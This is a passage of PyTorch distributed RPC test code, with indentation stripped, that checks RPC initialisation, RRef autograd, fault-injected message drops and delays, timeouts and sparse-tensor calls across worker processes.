# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
# Test init_rpc without world_size argument
@dist_init(setup_rpc=False)
def test_init_rpc_without_world_size(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
rpc_backend_options=self.rpc_backend_options,
)
# TODO: Need to sync before shutdown since ungraceful shutdown is not fully implemented
# Using process_group initialization as sync (could also use store based barrier)
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
rpc.shutdown(graceful=False)
# Dynamic RPC new ranks communicate with existing ranks
@dist_init(setup_rpc=False)
def test_without_world_size_new_rank_can_communicated_with_existing_rank(self):
# TODO: Using process group for synchronization to ensure rank 0 is created first
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
if self.rank == 0:
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
rpc_backend_options=self.rpc_backend_options,
)
# Rank 0 will be initialized with RPC after this barrier
dist.barrier()
if self.rank != 0:
# Newly joined ranks will be able to communicate with rank 0, since that was created first
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
rpc_backend_options=self.rpc_backend_options,
)
result = rpc.rpc_sync(worker_name(0), torch.add, args=(torch.tensor(1), torch.tensor(1)))
self.assertEqual(torch.add(torch.tensor(1), torch.tensor(1)), result)
# TODO: Remove the sync before shutdown and replace with graceful shutdown
dist.barrier()
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_init_rpc_without_world_size_without_rank(self):
# default initialization uses file init
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rpc_backend_options=self.rpc_backend_options,
)
# env init
with self.assertRaisesRegex(ValueError, "environment variable RANK expected"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(init_method="env://")
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rpc_backend_options=rpc_backend_options,
)
# tcp init
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(init_method="tcp://127.0.0.1:23456")
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rpc_backend_options=rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_init_dynamic_and_static_rpc_group(self):
# Initialize a static rpc group with size = self.world_size - 1
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
world_size_minus_one = self.world_size - 1
if self.rank < world_size_minus_one:
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=world_size_minus_one,
rpc_backend_options=self.rpc_backend_options,
)
dist.barrier()
# Attempt to add an additional dynamic group member
if self.rank == world_size_minus_one:
with self.assertRaisesRegex(RuntimeError, "RPC group mixes statically and dynamically\
initialized members which is not supported."):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
rpc_backend_options=self.rpc_backend_options,
)
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
# Set a high timeout since it doesn't affect test runtime and ensures
# the test doesn't erroneously timeout due to slow machines.
timeout = 100
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# rpc_async returns immediately and surface a timeout through wait()
if rref_api == slow_rref.rpc_async:
result.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
@dist_init
def test_send_to_rank_sparse(self):
dst_rank = (self.rank + 1) % self.world_size
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
